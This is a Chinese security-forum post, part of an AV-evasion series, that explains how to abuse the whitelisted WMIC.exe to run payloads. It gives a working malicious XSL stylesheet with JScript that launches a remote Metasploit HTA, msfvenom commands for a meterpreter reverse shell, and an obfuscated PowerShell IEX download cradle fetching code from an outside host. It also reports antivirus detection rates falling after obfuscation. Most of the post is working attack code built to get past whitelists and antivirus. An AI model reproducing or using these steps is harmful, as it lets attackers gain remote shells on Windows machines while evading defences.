设为首页收藏本站
开启辅助访问 切换到窄版

安全矩阵

 找回密码
 立即注册
搜索
安全矩阵»安全矩阵 安全矩阵实验室 shellcode免杀 远控免杀专题(53)-白名单WMIC.exe执行payload ...
返回列表 发新帖
查看: 3225|回复: 0

远控免杀专题(53)-白名单WMIC.exe执行payload

[复制链接]
caiH

22

主题

63

帖子

338

积分

中级会员

Rank: 3Rank: 3

积分
338
发表于 2020-3-21 19:13:10 | 显示全部楼层 |阅读模式
本帖最后由 caiH 于 2020-3-21 19:18 编辑

一、WMIC介绍MIC扩展WMI(Windows Management Instrumentation,Windows管理工具),提供了从命令行接口和批命令脚本执行系统管理的支持。在WMIC出现之前,如果要管理WMI系统,必须使用一些专门的WMI应用,例如SMS,或者使用WMI的脚本编程API,或者使用象CIM Studio之类的工具。如
果不熟悉C++之类的编程语言或VBScript之类的脚本语言,或者不掌握WMI名称空间的基本知识,要用WMI管理系统是很困难的。WMIC改变了这种情况。


二、WMIC的使用
Windows 2003 默认位置:

C:\WINDOWS\system32\wbem\wmic.exe C:\WINDOWS\SysWOW64\wbem\wmic.exe
Windows 7 默认位置:

C:\Windows\System32\wbem\WMIC.exe C:\Windows\SysWOW64\wbem\WMIC.exe
远程执行脚本方式
wmic os get /FORMAT:"http://10.211.55.10/payload.xsl"

三、使用WMIC远程加载paylaod
wmic可以远程执行任何文件或脚本,因此我们将在XSL代码中链接一个hta文件。XSL文件将包含一个链接,用于通过mshta.exe下载并执行恶
意hta文件,该文件由wmic触发。

3.1利用metasploit
在metasploit的帮助下生成一个hta文件


use exploit/windows/misc/hta_serverset SRVPORT 8088set srvhost 10.211.55.10

并放置在hta文件的链接 payload.xsl

<?xml version='1.0'?>
<stylesheetxmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"xmlns:user="placeholder"version="1.0">
<output method="text"/>        
<ms:script implements-prefix="user" language="JScript">   
<![CDATA[        var r = new ActiveXObject("WScript.Shell").Run("http://10.211.55.10:8088/0lEkSQQmpPP.hta");        ]]>
</ms:script></stylesheet>
目标机器上wmic运行

wmic os get /FORMAT:"http://10.211.55.10/payload.xsl"

执行后hta木马遭到火绒查杀,360提示powershell命令攻击。
点击允许后可上线。


将该hta放在virustotal.com上面检测,查杀率28/56
3.2自定义免杀
刚才发现hta文件使用了powershell,遭到拦截。我们重新修改一下。这里payload选择使用powershell

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.211.55.10 LPORT=8080 -f psh-reflection > a.ps1
使用powershell的IEX加载payload,并进行混淆

powershell "$a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://10.211.55.10/a.ps1''))';IEX ($a+$b)"
将该命令重命名为a.bat。使用wmic.exe加载脚本
wmic os get /FORMAT:"http://10.211.55.10/demo.xsl"


demo.xsl

<?xml version='1.0'?>
<stylesheetxmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"xmlns:user="placeholder"version="1.0">
<output method="text"/>        
<ms:script implements-prefix="user" language="JScript">        
<![CDATA[    var r = new ActiveXObject("WScript.Shell").Run("a.bat");        ]]>
</ms:script></stylesheet>





只有火绒提示"powershell执行可疑文件" 点击允许后可上线




a.bat在virustotal.com 上面查杀率为3/57




四、参考资料

使用wmic.exe绕过应用程序白名单(多种方法):
https://www.cnblogs.com/backlion/p/10489916.html




该文章转载自:https://mp.weixin.qq.com/s?__biz=Mzg2NTA4OTI5NA==&mid=2247486121&idx=1&sn=ade673ecedab646005d3401fea66d77a&chksm=ce5e28c8f929a1de0c9c31b3b0d9d4886c57668f2f4eab30f0545321411eec6143679543b82a&mpshare=1&scene=23&srcid=&sharer_sharetime=1584787944611&sharer_shareid=ff83fe2fe7db7fcd8a1fcbc183d841c4#rd



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 03:38 , Processed in 0.012973 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表